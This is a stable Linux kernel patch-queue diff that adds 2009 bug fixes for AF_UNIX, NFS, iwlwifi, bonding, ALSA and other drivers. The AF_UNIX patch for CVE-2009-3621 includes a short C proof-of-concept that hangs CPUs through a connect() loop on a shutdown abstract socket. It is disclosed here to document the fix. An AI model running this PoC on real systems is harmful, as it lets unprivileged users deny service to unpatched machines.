--- /dev/null
+From 77238f2b942b38ab4e7f3aced44084493e4a8675 Mon Sep 17 00:00:00 2001
+From: Tomoki Sekiyama <tomoki.sekiyama.qu@hitachi.com>
+Date: Sun, 18 Oct 2009 23:17:37 -0700
+Subject: AF_UNIX: Fix deadlock on connecting to shutdown socket (CVE-2009-3621)
+
+From: Tomoki Sekiyama <tomoki.sekiyama.qu@hitachi.com>
+
+commit 77238f2b942b38ab4e7f3aced44084493e4a8675 upstream.
+
+I found a deadlock bug in UNIX domain socket, which makes able to DoS
+attack against the local machine by non-root users.
+
+How to reproduce:
+1. Make a listening AF_UNIX/SOCK_STREAM socket with an abstruct
+ namespace(*), and shutdown(2) it.
+ 2. Repeat connect(2)ing to the listening socket from the other sockets
+ until the connection backlog is full-filled.
+ 3. connect(2) takes the CPU forever. If every core is taken, the
+ system hangs.
+
+PoC code: (Run as many times as cores on SMP machines.)
+
+int main(void)
+{
+ int ret;
+ int csd;
+ int lsd;
+ struct sockaddr_un sun;
+
+ /* make an abstruct name address (*) */
+ memset(&sun, 0, sizeof(sun));
+ sun.sun_family = PF_UNIX;
+ sprintf(&sun.sun_path[1], "%d", getpid());
+
+ /* create the listening socket and shutdown */
+ lsd = socket(AF_UNIX, SOCK_STREAM, 0);
+ bind(lsd, (struct sockaddr *)&sun, sizeof(sun));
+ listen(lsd, 1);
+ shutdown(lsd, SHUT_RDWR);
+
+ /* connect loop */
+ alarm(15); /* forcely exit the loop after 15 sec */
+ for (;;) {
+ csd = socket(AF_UNIX, SOCK_STREAM, 0);
+ ret = connect(csd, (struct sockaddr *)&sun, sizeof(sun));
+ if (-1 == ret) {
+ perror("connect()");
+ break;
+ }
+ puts("Connection OK");
+ }
+ return 0;
+}
+
+(*) Make sun_path[0] = 0 to use the abstruct namespace.
+ If a file-based socket is used, the system doesn't deadlock because
+ of context switches in the file system layer.
+
+Why this happens:
+ Error checks between unix_socket_connect() and unix_wait_for_peer() are
+ inconsistent. The former calls the latter to wait until the backlog is
+ processed. Despite the latter returns without doing anything when the
+ socket is shutdown, the former doesn't check the shutdown state and
+ just retries calling the latter forever.
+
+Patch:
+ The patch below adds shutdown check into unix_socket_connect(), so
+ connect(2) to the shutdown socket will return -ECONREFUSED.
+
+Signed-off-by: Tomoki Sekiyama <tomoki.sekiyama.qu@hitachi.com>
+Signed-off-by: Masanori Yoshida <masanori.yoshida.tv@hitachi.com>
+Cc: Chuck Ebbert <cebbert@redhat.com>
+Signed-off-by: David S. Miller <davem@davemloft.net>
+
+---
+ net/unix/af_unix.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -1074,6 +1074,8 @@ restart:
+ err = -ECONNREFUSED;
+ if (other->sk_state != TCP_LISTEN)
+ goto out_unlock;
++ if (other->sk_shutdown & RCV_SHUTDOWN)
++ goto out_unlock;
+
+ if (unix_recvq_full(other)) {
+ err = -EAGAIN;
--- /dev/null
+From bd3c200e6d5495343c91db66d2acf1853b57a141 Mon Sep 17 00:00:00 2001
+From: David Henningsson <launchpad.web@epost.diwic.se>
+Date: Sun, 11 Oct 2009 11:37:22 +0200
+Subject: ALSA: ice1724 - Make call to set hw params succeed on ESI Juli@
+
+From: David Henningsson <launchpad.web@epost.diwic.se>
+
+commit bd3c200e6d5495343c91db66d2acf1853b57a141 upstream.
+
+If two streams are started immediately after one another (such as a
+playback and a recording stream), the call to set hw params fails with
+EBUSY. This patch makes the call succeed, so playback and recording will
+work properly.
+
+Signed-off-by: David Henningsson <launchpad.web@epost.diwic.se>
+Signed-off-by: Takashi Iwai <tiwai@suse.de>
+Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
+
+---
+ sound/pci/ice1712/ice1724.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+--- a/sound/pci/ice1712/ice1724.c
++++ b/sound/pci/ice1712/ice1724.c
+@@ -643,7 +643,7 @@ static int snd_vt1724_set_pro_rate(struc
+ (inb(ICEMT1724(ice, DMA_PAUSE)) & DMA_PAUSES)) {
+ /* running? we cannot change the rate now... */
+ spin_unlock_irqrestore(&ice->reg_lock, flags);
+- return -EBUSY;
++ return ((rate == ice->cur_rate) && !force) ? 0 : -EBUSY;
+ }
+ if (!force && is_pro_rate_locked(ice)) {
+ spin_unlock_irqrestore(&ice->reg_lock, flags);
--- /dev/null
+From d9d5283228d0c752f199c901fff6e1405dc91bcb Mon Sep 17 00:00:00 2001
+From: Jiri Bohac <jbohac@suse.cz>
+Date: Wed, 28 Oct 2009 22:23:54 -0700
+Subject: bonding: fix a race condition in calls to slave MII ioctls
+
+From: Jiri Bohac <jbohac@suse.cz>
+
+commit d9d5283228d0c752f199c901fff6e1405dc91bcb upstream.
+
+In mii monitor mode, bond_check_dev_link() calls the the ioctl
+handler of slave devices. It stores the ndo_do_ioctl function
+pointer to a static (!) ioctl variable and later uses it to call the
+handler with the IOCTL macro.
+
+If another thread executes bond_check_dev_link() at the same time
+(even with a different bond, which none of the locks prevent), a
+race condition occurs. If the two racing slaves have different
+drivers, this may result in one driver's ioctl handler being
+called with a pointer to a net_device controlled with a different
+driver, resulting in unpredictable breakage.
+
+Unless I am overlooking something, the "static" must be a
+copy'n'paste error (?).
+
+Signed-off-by: Jiri Bohac <jbohac@suse.cz>
+Signed-off-by: David S. Miller <davem@davemloft.net>
+Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
+
+---
+ drivers/net/bonding/bond_main.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -691,7 +691,7 @@ static int bond_check_dev_link(struct bo
+ struct net_device *slave_dev, int reporting)
+ {
+ const struct net_device_ops *slave_ops = slave_dev->netdev_ops;
+- static int (*ioctl)(struct net_device *, struct ifreq *, int);
++ int (*ioctl)(struct net_device *, struct ifreq *, int);
+ struct ifreq ifr;
+ struct mii_ioctl_data *mii;
+
--- /dev/null
+From 371dc4a6d8c3c74a9a1c74b87c2affb3fcef6500 Mon Sep 17 00:00:00 2001
+From: Jean Delvare <khali@linux-fr.org>
+Date: Sat, 24 Oct 2009 13:28:47 +0200
+Subject: hwmon: (it87) Fix VID reading on IT8718F/IT8720F
+
+From: Jean Delvare <khali@linux-fr.org>
+
+commit 371dc4a6d8c3c74a9a1c74b87c2affb3fcef6500 upstream.
+
+Comparing apples to bananas doesn't seem right. Consistently use the
+chips enum for chip type comparisons, to avoid such bugs in the
+future.
+
+The bug has been there since support for the IT8718F was added, so
+VID never worked for this chip nor for the similar IT8720F.
+
+Signed-off-by: Jean Delvare <khali@linux-fr.org>
+Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
+
+---
+ drivers/hwmon/it87.c | 5 ++---
+ 1 file changed, 2 insertions(+), 3 deletions(-)
+
+--- a/drivers/hwmon/it87.c
++++ b/drivers/hwmon/it87.c
+@@ -1028,12 +1028,11 @@ static int __init it87_find(unsigned sho
+ chip_type, *address, sio_data->revision);
+
+ /* Read GPIO config and VID value from LDN 7 (GPIO) */
+- if (chip_type != IT8705F_DEVID) {
++ if (sio_data->type != it87) {
+ int reg;
+
+ superio_select(GPIO);
+- if ((chip_type == it8718) ||
+- (chip_type == it8720))
++ if (sio_data->type == it8718 || sio_data->type == it8720)
+ sio_data->vid_value = superio_inb(IT87_SIO_VID_REG);
+
+ reg = superio_inb(IT87_SIO_PINX2_REG);
--- /dev/null
+From de0bd50845eb5935ce3d503c5d2f565d6cb9ece1 Mon Sep 17 00:00:00 2001
+From: Reinette Chatre <reinette.chatre@intel.com>
+Date: Fri, 11 Sep 2009 10:38:12 -0700
+Subject: iwlwifi: fix potential rx buffer loss
+
+From: Reinette Chatre <reinette.chatre@intel.com>
+
+commit de0bd50845eb5935ce3d503c5d2f565d6cb9ece1 upstream.
+
+RX handling maintains a few lists that keep track of the RX buffers.
+Buffers move from one list to the other as they are used, replenished, and
+again made available for usage. In one such instance, when a buffer is used
+it enters the "rx_used" list. When buffers are replenished an skb is
+attached to the buffer and it is moved to the "rx_free" list. The problem
+here is that the buffer is first removed from the "rx_used" list _before_ the
+skb is allocated. Thus, if the skb allocation fails this buffer remains
+removed from the "rx_used" list and is thus lost for future usage.
+
+Fix this by first allocating the skb before trying to attach it to a list.
+We add an additional check to not do this unnecessarily.
+
+Reported-by: Rick Farrington <rickdic@hotmail.com>
+Signed-off-by: Reinette Chatre <reinette.chatre@intel.com>
+Signed-off-by: John W. Linville <linville@tuxdriver.com>
+Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
+
+---
+ drivers/net/wireless/iwlwifi/iwl-rx.c | 24 +++++++++++++++++-------
+ drivers/net/wireless/iwlwifi/iwl3945-base.c | 24 ++++++++++++++++--------
+ 2 files changed, 33 insertions(+), 15 deletions(-)
+
+--- a/drivers/net/wireless/iwlwifi/iwl3945-base.c
++++ b/drivers/net/wireless/iwlwifi/iwl3945-base.c
+@@ -1196,6 +1196,7 @@ static void iwl3945_rx_allocate(struct i
+ struct iwl_rx_queue *rxq = &priv->rxq;
+ struct list_head *element;
+ struct iwl_rx_mem_buffer *rxb;
++ struct sk_buff *skb;
+ unsigned long flags;
+
+ while (1) {
+@@ -1205,17 +1206,11 @@ static void iwl3945_rx_allocate(struct i
+ spin_unlock_irqrestore(&rxq->lock, flags);
+ return;
+ }
+-
+- element = rxq->rx_used.next;
+- rxb = list_entry(element, struct iwl_rx_mem_buffer, list);
+- list_del(element);
+ spin_unlock_irqrestore(&rxq->lock, flags);
+
+ /* Alloc a new receive buffer */
+- rxb->skb =
+- alloc_skb(priv->hw_params.rx_buf_size,
+- priority);
+- if (!rxb->skb) {
++ skb = alloc_skb(priv->hw_params.rx_buf_size, priority);
++ if (!skb) {
+ if (net_ratelimit())
+ IWL_CRIT(priv, ": Can not allocate SKB buffers\n");
+ /* We don't reschedule replenish work here -- we will
+@@ -1224,6 +1219,19 @@ static void iwl3945_rx_allocate(struct i
+ break;
+ }
+
++ spin_lock_irqsave(&rxq->lock, flags);
++ if (list_empty(&rxq->rx_used)) {
++ spin_unlock_irqrestore(&rxq->lock, flags);
++ dev_kfree_skb_any(skb);
++ return;
++ }
++ element = rxq->rx_used.next;
++ rxb = list_entry(element, struct iwl_rx_mem_buffer, list);
++ list_del(element);
++ spin_unlock_irqrestore(&rxq->lock, flags);
++
++ rxb->skb = skb;
++
+ /* If radiotap head is required, reserve some headroom here.
+ * The physical head count is a variable rx_stats->phy_count.
+ * We reserve 4 bytes here. Plus these extra bytes, the
+--- a/drivers/net/wireless/iwlwifi/iwl-rx.c
++++ b/drivers/net/wireless/iwlwifi/iwl-rx.c
+@@ -239,26 +239,22 @@ void iwl_rx_allocate(struct iwl_priv *pr
+ struct iwl_rx_queue *rxq = &priv->rxq;
+ struct list_head *element;
+ struct iwl_rx_mem_buffer *rxb;
++ struct sk_buff *skb;
+ unsigned long flags;
+
+ while (1) {
+ spin_lock_irqsave(&rxq->lock, flags);
+-
+ if (list_empty(&rxq->rx_used)) {
+ spin_unlock_irqrestore(&rxq->lock, flags);
+ return;
+ }
+- element = rxq->rx_used.next;
+- rxb = list_entry(element, struct iwl_rx_mem_buffer, list);
+- list_del(element);
+-
+ spin_unlock_irqrestore(&rxq->lock, flags);
+
+ /* Alloc a new receive buffer */
+- rxb->skb = alloc_skb(priv->hw_params.rx_buf_size + 256,
++ skb = alloc_skb(priv->hw_params.rx_buf_size + 256,
+ priority);
+
+- if (!rxb->skb) {
++ if (!skb) {
+ IWL_CRIT(priv, "Can not allocate SKB buffers\n");
+ /* We don't reschedule replenish work here -- we will
+ * call the restock method and if it still needs
+@@ -266,6 +262,20 @@ void iwl_rx_allocate(struct iwl_priv *pr
+ break;
+ }
+
++ spin_lock_irqsave(&rxq->lock, flags);
++
++ if (list_empty(&rxq->rx_used)) {
++ spin_unlock_irqrestore(&rxq->lock, flags);
++ dev_kfree_skb_any(skb);
++ return;
++ }
++ element = rxq->rx_used.next;
++ rxb = list_entry(element, struct iwl_rx_mem_buffer, list);
++ list_del(element);
++
++ spin_unlock_irqrestore(&rxq->lock, flags);
++
++ rxb->skb = skb;
+ /* Get physical address of RB/SKB */
+ rxb->real_dma_addr = pci_map_single(
+ priv->pci_dev,
--- /dev/null
+From f82a924cc88a5541df1d4b9d38a0968cd077a051 Mon Sep 17 00:00:00 2001
+From: Reinette Chatre <reinette.chatre@intel.com>
+Date: Thu, 17 Sep 2009 10:43:56 -0700
+Subject: iwlwifi: reduce noise when skb allocation fails
+
+From: Reinette Chatre <reinette.chatre@intel.com>
+
+commit f82a924cc88a5541df1d4b9d38a0968cd077a051 upstream.
+
+Replenishment of receive buffers is done in the tasklet handling
+received frames as well as in a workqueue. When we are in the tasklet
+we cannot sleep and thus attempt atomic skb allocations. It is generally
+not a big problem if this fails since iwl_rx_allocate is always followed
+by a call to iwl_rx_queue_restock which will queue the work to replenish
+the buffers at a time when sleeping is allowed.
+
+We thus add the __GFP_NOWARN to the skb allocation in iwl_rx_allocate to
+reduce the noise if such an allocation fails while we still have enough
+buffers. We do maintain the warning and the error message when we are low
+on buffers to communicate to the user that there is a potential problem with
+memory availability on system
+
+This addresses issue reported upstream in thread "iwlagn: order 2 page
+allocation failures" in
+http://thread.gmane.org/gmane.linux.kernel.wireless.general/39187
+
+Signed-off-by: Reinette Chatre <reinette.chatre@intel.com>
+Acked-by: Mel Gorman <mel@csn.ul.ie>
+Signed-off-by: John W. Linville <linville@tuxdriver.com>
+Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
+
+---
+ drivers/net/wireless/iwlwifi/iwl-rx.c | 10 +++++++++-
+ drivers/net/wireless/iwlwifi/iwl3945-base.c | 9 ++++++++-
+ 2 files changed, 17 insertions(+), 2 deletions(-)
+
+--- a/drivers/net/wireless/iwlwifi/iwl3945-base.c
++++ b/drivers/net/wireless/iwlwifi/iwl3945-base.c
+@@ -1208,11 +1208,18 @@ static void iwl3945_rx_allocate(struct i
+ }
+ spin_unlock_irqrestore(&rxq->lock, flags);
+
++ if (rxq->free_count > RX_LOW_WATERMARK)
++ priority |= __GFP_NOWARN;
+ /* Alloc a new receive buffer */
+ skb = alloc_skb(priv->hw_params.rx_buf_size, priority);
+ if (!skb) {
+ if (net_ratelimit())
+- IWL_CRIT(priv, ": Can not allocate SKB buffers\n");
++ IWL_DEBUG_INFO(priv, "Failed to allocate SKB buffer.\n");
++ if ((rxq->free_count <= RX_LOW_WATERMARK) &&
++ net_ratelimit())
++ IWL_CRIT(priv, "Failed to allocate SKB buffer with %s. Only %u free buffers remaining.\n",
++ priority == GFP_ATOMIC ? "GFP_ATOMIC" : "GFP_KERNEL",
++ rxq->free_count);
+ /* We don't reschedule replenish work here -- we will
+ * call the restock method and if it still needs
+ * more buffers it will schedule replenish */
+--- a/drivers/net/wireless/iwlwifi/iwl-rx.c
++++ b/drivers/net/wireless/iwlwifi/iwl-rx.c
+@@ -250,12 +250,20 @@ void iwl_rx_allocate(struct iwl_priv *pr
+ }
+ spin_unlock_irqrestore(&rxq->lock, flags);
+
++ if (rxq->free_count > RX_LOW_WATERMARK)
++ priority |= __GFP_NOWARN;
+ /* Alloc a new receive buffer */
+ skb = alloc_skb(priv->hw_params.rx_buf_size + 256,
+ priority);
+
+ if (!skb) {
+- IWL_CRIT(priv, "Can not allocate SKB buffers\n");
++ if (net_ratelimit())
++ IWL_DEBUG_INFO(priv, "Failed to allocate SKB buffer.\n");
++ if ((rxq->free_count <= RX_LOW_WATERMARK) &&
++ net_ratelimit())
++ IWL_CRIT(priv, "Failed to allocate SKB buffer with %s. Only %u free buffers remaining.\n",
++ priority == GFP_ATOMIC ? "GFP_ATOMIC" : "GFP_KERNEL",
++ rxq->free_count);
+ /* We don't reschedule replenish work here -- we will
+ * call the restock method and if it still needs
+ * more buffers it will schedule replenish */
--- /dev/null
+From ad61df918c44316940404891d5082c63e79c256a Mon Sep 17 00:00:00 2001
+From: Jiri Pirko <jpirko@redhat.com>
+Date: Thu, 8 Oct 2009 01:21:46 -0700
+Subject: netlink: fix typo in initialization (CVE-2009-3612)
+
+From: Jiri Pirko <jpirko@redhat.com>
+
+commit ad61df918c44316940404891d5082c63e79c256a upstream.
+
+Commit 9ef1d4c7c7aca1cd436612b6ca785b726ffb8ed8 ("[NETLINK]: Missing
+initializations in dumped data") introduced a typo in
+initialization. This patch fixes this.
+
+Signed-off-by: Jiri Pirko <jpirko@redhat.com>
+Signed-off-by: David S. Miller <davem@davemloft.net>
+Cc: Chuck Ebbert <cebbert@redhat.com>
+Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
+
+---
+ net/sched/cls_api.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+--- a/net/sched/cls_api.c
++++ b/net/sched/cls_api.c
+@@ -348,7 +348,7 @@ static int tcf_fill_node(struct sk_buff
+ tcm = NLMSG_DATA(nlh);
+ tcm->tcm_family = AF_UNSPEC;
+ tcm->tcm__pad1 = 0;
+- tcm->tcm__pad1 = 0;
++ tcm->tcm__pad2 = 0;
+ tcm->tcm_ifindex = qdisc_dev(tp->q)->ifindex;
+ tcm->tcm_parent = tp->classid;
+ tcm->tcm_info = TC_H_MAKE(tp->prio, tp->protocol);
--- /dev/null
+From f4373bf9e67e4a653c8854acd7b02dac9714c98a Mon Sep 17 00:00:00 2001
+From: Ben Hutchings <ben@decadent.org.uk>
+Date: Tue, 6 Oct 2009 15:42:18 -0400
+Subject: nfs: Avoid overrun when copying client IP address string
+
+From: Ben Hutchings <ben@decadent.org.uk>
+
+commit f4373bf9e67e4a653c8854acd7b02dac9714c98a upstream.
+
+As seen in <http://bugs.debian.org/549002>, nfs4_init_client() can
+overrun the source string when copying the client IP address from
+nfs_parsed_mount_data::client_address to nfs_client::cl_ipaddr. Since
+these are both treated as null-terminated strings elsewhere, the copy
+should be done with strlcpy() not memcpy().
+
+Signed-off-by: Ben Hutchings <ben@decadent.org.uk>
+Signed-off-by: Trond Myklebust <Trond.Myklebust@netapp.com>
+Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
+
+---
+ fs/nfs/client.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+--- a/fs/nfs/client.c
++++ b/fs/nfs/client.c
+@@ -1171,7 +1171,7 @@ static int nfs4_init_client(struct nfs_c
+ 1, flags & NFS_MOUNT_NORESVPORT);
+ if (error < 0)
+ goto error;
+- memcpy(clp->cl_ipaddr, ip_addr, sizeof(clp->cl_ipaddr));
++ strlcpy(clp->cl_ipaddr, ip_addr, sizeof(clp->cl_ipaddr));
+
+ error = nfs_idmap_new(clp);
+ if (error < 0) {
--- /dev/null
+From a8b40bc7e635831b61c43acc71a86d3a68b2dff0 Mon Sep 17 00:00:00 2001
+From: Terry Loftin <terry.loftin@hp.com>
+Date: Thu, 22 Oct 2009 21:36:01 -0400
+Subject: nfs: Panic when commit fails
+
+From: Terry Loftin <terry.loftin@hp.com>
+
+commit a8b40bc7e635831b61c43acc71a86d3a68b2dff0 upstream.
+
+Actually pass the NFS_FILE_SYNC option to the server to avoid a
+Panic in nfs_direct_write_complete() when a commit fails.
+
+At the end of an nfs write, if the nfs commit fails, all the writes
+will be rescheduled. They are supposed to be rescheduled as NFS_FILE_SYNC
+writes, but the rpc_task structure is not completely intialized and so
+the option is not passed. When the rescheduled writes complete, the
+return indicates that they are NFS_UNSTABLE and we try to do another
+commit. This leads to a Panic because the commit data structure pointer
+was set to null in the initial (failed) commit attempt.
+
+Signed-off-by: Terry Loftin <terry.loftin@hp.com>
+Signed-off-by: Trond Myklebust <Trond.Myklebust@netapp.com>
+Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
+
+---
+ fs/nfs/direct.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+--- a/fs/nfs/direct.c
++++ b/fs/nfs/direct.c
+@@ -457,6 +457,7 @@ static void nfs_direct_write_reschedule(
+ };
+ struct rpc_task_setup task_setup_data = {
+ .rpc_client = NFS_CLIENT(inode),
++ .rpc_message = &msg,
+ .callback_ops = &nfs_write_direct_ops,
+ .workqueue = nfsiod_workqueue,
+ .flags = RPC_TASK_ASYNC,
--- /dev/null
+From 52567b03ca38b6e556ced450d64dba8d66e23b0e Mon Sep 17 00:00:00 2001
+From: Trond Myklebust <Trond.Myklebust@netapp.com>
+Date: Fri, 23 Oct 2009 14:46:42 -0400
+Subject: NFSv4: Fix a bug when the server returns NFS4ERR_RESOURCE
+
+From: Trond Myklebust <Trond.Myklebust@netapp.com>
+
+commit 52567b03ca38b6e556ced450d64dba8d66e23b0e upstream.
+
+RFC 3530 states that when we recieve the error NFS4ERR_RESOURCE, we are not
+supposed to bump the sequence number on OPEN, LOCK, LOCKU, CLOSE, etc
+operations. The problem is that we map that error into EREMOTEIO in the XDR
+layer, and so the NFSv4 middle-layer routines like seqid_mutating_err(),
+and nfs_increment_seqid() don't recognise it.
+
+The fix is to defer the mapping until after the middle layers have
+processed the error.
+
+Signed-off-by: Trond Myklebust <Trond.Myklebust@netapp.com>
+Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
+
+---
+ fs/nfs/nfs4proc.c | 11 ++++++++---
+ fs/nfs/nfs4xdr.c | 1 -
+ 2 files changed, 8 insertions(+), 4 deletions(-)
+
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -71,12 +71,17 @@ static int _nfs4_proc_getattr(struct nfs
+ /* Prevent leaks of NFSv4 errors into userland */
+ static int nfs4_map_errors(int err)
+ {
+- if (err < -1000) {
++ if (err >= -1000)
++ return err;
++ switch (err) {
++ case -NFS4ERR_RESOURCE:
++ return -EREMOTEIO;
++ default:
+ dprintk("%s could not handle NFSv4 error %d\n",
+ __func__, -err);
+- return -EIO;
++ break;
+ }
+- return err;
++ return -EIO;
+ }
+
+ /*
+--- a/fs/nfs/nfs4xdr.c
++++ b/fs/nfs/nfs4xdr.c
+@@ -5406,7 +5406,6 @@ static struct {
+ { NFS4ERR_SERVERFAULT, -ESERVERFAULT },
+ { NFS4ERR_BADTYPE, -EBADTYPE },
+ { NFS4ERR_LOCKED, -EAGAIN },
+- { NFS4ERR_RESOURCE, -EREMOTEIO },
+ { NFS4ERR_SYMLINK, -ELOOP },
+ { NFS4ERR_OP_ILLEGAL, -EOPNOTSUPP },
+ { NFS4ERR_DEADLOCK, -EDEADLK },
--- /dev/null
+From 141aeb9f26f9f12f1584c128ce8697cdffb046e7 Mon Sep 17 00:00:00 2001
+From: Trond Myklebust <Trond.Myklebust@netapp.com>
+Date: Mon, 26 Oct 2009 08:09:46 -0400
+Subject: NFSv4: Fix two unbalanced put_rpccred() issues.
+
+From: Trond Myklebust <Trond.Myklebust@netapp.com>
+
+commit 141aeb9f26f9f12f1584c128ce8697cdffb046e7 upstream.
+
+Commits 29fba38b (nfs41: lease renewal) and fc01cea9 (nfs41: sequence
+operation) introduce a couple of put_rpccred() calls on credentials for
+which there is no corresponding get_rpccred().
+
+See http://bugzilla.kernel.org/show_bug.cgi?id=14249
+
+Signed-off-by: Trond Myklebust <Trond.Myklebust@netapp.com>
+Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
+
+---
+ fs/nfs/nfs4proc.c | 4 ----
+ 1 file changed, 4 deletions(-)
+
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -3038,9 +3038,6 @@ static void nfs4_renew_done(struct rpc_t
+ if (time_before(clp->cl_last_renewal,timestamp))
+ clp->cl_last_renewal = timestamp;
+ spin_unlock(&clp->cl_lock);
+- dprintk("%s calling put_rpccred on rpc_cred %p\n", __func__,
+- task->tk_msg.rpc_cred);
+- put_rpccred(task->tk_msg.rpc_cred);
+ }
+
+ static const struct rpc_call_ops nfs4_renew_ops = {
+@@ -4855,7 +4852,6 @@ void nfs41_sequence_call_done(struct rpc
+ nfs41_sequence_free_slot(clp, task->tk_msg.rpc_resp);
+ dprintk("%s rpc_cred %p\n", __func__, task->tk_msg.rpc_cred);
+
+- put_rpccred(task->tk_msg.rpc_cred);
+ kfree(task->tk_msg.rpc_argp);
+ kfree(task->tk_msg.rpc_resp);
+
--- /dev/null
+From 3050141bae57984dd660e6861632ccf9b8bca77e Mon Sep 17 00:00:00 2001
+From: Trond Myklebust <Trond.Myklebust@netapp.com>
+Date: Thu, 8 Oct 2009 11:50:55 -0400
+Subject: NFSv4: Kill nfs4_renewd_prepare_shutdown()
+
+From: Trond Myklebust <Trond.Myklebust@netapp.com>
+
+commit 3050141bae57984dd660e6861632ccf9b8bca77e upstream.
+
+The NFSv4 renew daemon is shared between all active super blocks that refer
+to a particular NFS server, so it is wrong to be shutting it down in
+nfs4_kill_super every time a super block is destroyed.
+
+This patch therefore kills nfs4_renewd_prepare_shutdown altogether, and
+leaves it up to nfs4_shutdown_client() to also shut down the renew daemon
+by means of the existing call to nfs4_kill_renewd().
+
+Signed-off-by: Trond Myklebust <Trond.Myklebust@netapp.com>
+Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
+
+---
+ fs/nfs/nfs4renewd.c | 6 ------
+ fs/nfs/super.c | 1 -
+ 2 files changed, 7 deletions(-)
+
+--- a/fs/nfs/nfs4renewd.c
++++ b/fs/nfs/nfs4renewd.c
+@@ -127,12 +127,6 @@ nfs4_schedule_state_renewal(struct nfs_c
+ }
+
+ void
+-nfs4_renewd_prepare_shutdown(struct nfs_server *server)
+-{
+- cancel_delayed_work(&server->nfs_client->cl_renewd);
+-}
+-
+-void
+ nfs4_kill_renewd(struct nfs_client *clp)
+ {
+ cancel_delayed_work_sync(&clp->cl_renewd);
+--- a/fs/nfs/super.c
++++ b/fs/nfs/super.c
+@@ -2670,7 +2670,6 @@ static void nfs4_kill_super(struct super
+ dprintk("--> %s\n", __func__);
+ nfs_super_return_all_delegations(sb);
+ kill_anon_super(sb);
+- nfs4_renewd_prepare_shutdown(server);
+ nfs_fscache_release_super_cookie(sb);
+ nfs_free_server(server);
+ dprintk("<-- %s\n", __func__);
--- /dev/null
+From 9a3936aac133037f65124fcb2d676a6c201a90a4 Mon Sep 17 00:00:00 2001
+From: Trond Myklebust <Trond.Myklebust@netapp.com>
+Date: Mon, 26 Oct 2009 08:09:46 -0400
+Subject: NFSv4: The link() operation should return any delegation on the file
+
+From: Trond Myklebust <Trond.Myklebust@netapp.com>
+
+commit 9a3936aac133037f65124fcb2d676a6c201a90a4 upstream.
+
+Otherwise, we have to wait for the server to recall it.
+
+Signed-off-by: Trond Myklebust <Trond.Myklebust@netapp.com>
+Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
+
+---
+ fs/nfs/dir.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+--- a/fs/nfs/dir.c
++++ b/fs/nfs/dir.c
+@@ -1536,6 +1536,8 @@ nfs_link(struct dentry *old_dentry, stru
+ old_dentry->d_parent->d_name.name, old_dentry->d_name.name,
+ dentry->d_parent->d_name.name, dentry->d_name.name);
+
++ nfs_inode_return_delegation(inode);
++
+ d_drop(dentry);
+ error = NFS_PROTO(dir)->link(inode, dir, &dentry->d_name);
+ if (error == 0) {
--- /dev/null
+From 6fdc31a2b86cf1f98e3eed896578ad9659eeb0f8 Mon Sep 17 00:00:00 2001
+From: Bastian Blank <bastian@waldi.eu.org>
+Date: Wed, 12 Aug 2009 23:30:45 +0000
+Subject: powerpc: Remove SMP warning from PowerMac cpufreq
+
+From: Bastian Blank <bastian@waldi.eu.org>
+
+commit 6fdc31a2b86cf1f98e3eed896578ad9659eeb0f8 upstream.
+
+On Thu, Aug 13, 2009 at 04:14:58PM +1000, Benjamin Herrenschmidt wrote:
+> On Tue, 2009-08-11 at 11:39 +0200, Bastian Blank wrote:
+> > This patch just disables this driver on SMP kernels, as it is obviously
+> > not supported.
+> Why not remove the #error instead ? :-) I don't think it's still
+> meaningful, especially since we use the timebase for delays nowadays
+> which doesn't depend on the CPU frequency...
+
+Your call. Take this one:
+
+The build of a PowerMac 32bit kernel currently fails with
+
+error: #warning "WARNING, CPUFREQ not recommended on SMP kernels"
+
+Thie patch removes the not longer applicable SMP warning from the
+PowerMac cpufreq code.
+
+Signed-off-by: Bastian Blank <waldi@debian.org>
+Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
+Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
+
+---
+ arch/powerpc/platforms/powermac/cpufreq_32.c | 8 --------
+ 1 file changed, 8 deletions(-)
+
+--- a/arch/powerpc/platforms/powermac/cpufreq_32.c
++++ b/arch/powerpc/platforms/powermac/cpufreq_32.c
+@@ -44,14 +44,6 @@
+ */
+ #undef DEBUG_FREQ
+
+-/*
+- * There is a problem with the core cpufreq code on SMP kernels,
+- * it won't recalculate the Bogomips properly
+- */
+-#ifdef CONFIG_SMP
+-#warning "WARNING, CPUFREQ not recommended on SMP kernels"
+-#endif
+-
+ extern void low_choose_7447a_dfs(int dfs);
+ extern void low_choose_750fx_pll(int pll);
+ extern void low_sleep_handler(void);
keys-get_instantiation_keyring-should-inc-the-keyring-refcount-in-all-cases.patch
b43-fix-bugzilla-14181-and-the-bug-from-the-previous-fix.patch
pata_sc1200-fix-crash-on-boot.patch
+af_unix-fix-deadlock-on-connecting-to-shutdown-socket-cve-2009-3621.patch
+alsa-ice1724-make-call-to-set-hw-params-succeed-on-esi-juli.patch
+bonding-fix-a-race-condition-in-calls-to-slave-mii-ioctls.patch
+hwmon-it87-fix-vid-reading-on-it8718f-it8720f.patch
+netlink-fix-typo-in-initialization-cve-2009-3612.patch
+nfs-avoid-overrun-when-copying-client-ip-address-string.patch
+nfs-panic-when-commit-fails.patch
